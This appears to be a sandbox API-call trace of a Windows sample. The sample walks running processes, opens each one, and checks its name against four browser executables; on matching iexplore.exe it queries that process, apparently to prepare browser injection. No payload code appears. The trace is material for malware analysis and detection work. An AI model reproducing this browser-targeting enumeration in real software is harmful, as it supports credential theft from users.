	[0252.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa4f4
	[0252.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.218] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.218] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.219] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.219] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0252.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa4f8
	[0252.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.220] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.220] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.221] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.221] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa4fc
	[0252.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.223] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.223] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.223] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.223] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa500
	[0252.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.225] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.225] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.226] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.226] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa504
	[0252.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.228] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.228] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.228] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.229] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0252.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa508
	[0252.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.230] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0252.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.230] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.230] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0252.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.231] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0252.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa50c
	[0252.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.234] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.234] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.234] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.234] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0252.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa510
	[0252.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.236] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0252.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.236] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.236] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0252.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.236] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0252.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0252.238] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0252.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa514
	[0252.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.239] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0252.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.239] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.240] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0252.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.241] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0252.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa518
	[0252.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.242] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0252.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.242] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.243] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0252.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.243] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0252.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa51c
	[0252.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.244] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0252.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.244] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.245] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0252.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.245] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0252.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa520
	[0252.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.246] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0252.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.246] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.247] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0252.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.247] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.247] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0252.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa524
	[0252.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.249] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0252.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.249] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.250] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0252.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.250] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0252.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa528
	[0252.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.252] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0252.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.252] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.252] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0252.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.253] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0252.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa52c
	[0252.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.254] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0252.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.254] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.254] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0252.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.255] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.255] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0252.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa530
	[0252.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.256] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0252.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.257] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.257] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0252.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.258] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.258] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0252.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa534
	[0252.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.259] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0252.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.259] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.259] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0252.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.260] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0252.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa538
	[0252.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.261] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0252.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.261] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.261] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0252.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.262] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0252.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa53c
	[0252.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.263] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0252.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.263] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.264] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0252.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.264] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0252.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa540
	[0252.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.265] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0252.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.266] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.266] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0252.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.267] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0252.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa544
	[0252.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.268] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0252.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.269] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.269] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0252.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.270] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0252.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa548
	[0252.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.271] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0252.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.272] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.273] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0252.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.273] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0252.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa54c
	[0252.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.275] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0252.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.275] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.276] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0252.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.276] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa550
	[0252.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.277] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.278] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.278] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.278] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.278] NtQueryInformationProcess (in: ProcessHandle=0xa550, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
